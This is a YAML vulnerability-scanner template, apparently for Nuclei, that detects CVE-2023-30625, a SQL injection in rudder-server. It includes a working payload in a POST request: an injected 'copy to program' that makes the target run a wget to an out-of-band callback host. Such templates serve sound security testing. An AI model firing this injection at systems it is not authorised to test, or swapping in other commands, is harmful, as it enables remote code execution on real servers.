38 lines
1.3 KiB
YAML
38 lines
1.3 KiB
YAML
|
id: CVE-2023-30625
|
||
|
|
||
|
info:
|
||
|
name: Rudder Server - SQL Injection
|
||
|
author: gy741
|
||
|
severity: high
|
||
|
description: |
|
||
|
rudder-server is part of RudderStack, an open source Customer Data Platform (CDP). Versions of rudder-server prior to 1.3.0-rc.1 are vulnerable to SQL injection. This issue may lead to Remote Code Execution (RCE) due to the `rudder` role in PostgresSQL having superuser permissions by default. Version 1.3.0-rc.1 contains patches for this issue.
|
||
|
reference:
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-30625
|
||
|
- https://securitylab.github.com/advisories/GHSL-2022-097_rudder-server/
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||
|
cvss-score: 8.8
|
||
|
cve-id: CVE-2023-30625
|
||
|
cwe-id: CWE-89
|
||
|
epss-score: 0.010870000
|
||
|
epss-percentile: 0.826540000
|
||
|
cpe: cpe:2.3:a:rudderstack:rudder-server:*:*:*:*:*:*:*:*
|
||
|
tags: rudder-server,rudderstack,cve,cve2023
|
||
|
|
||
|
variables:
|
||
|
cmd: "wget {{interactsh-url}}"
|
||
|
|
||
|
requests:
|
||
|
- raw:
|
||
|
- |
|
||
|
POST /v1/warehouse/pending-events HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
|
||
|
{"source_id": "test'; copy (SELECT '') to program '{{cmd}}'-- - "}
|
||
|
|
||
|
matchers:
|
||
|
- type: word
|
||
|
part: interactsh_protocol # Confirms the DNS Interaction
|
||
|
words:
|
||
|
- "dns"
|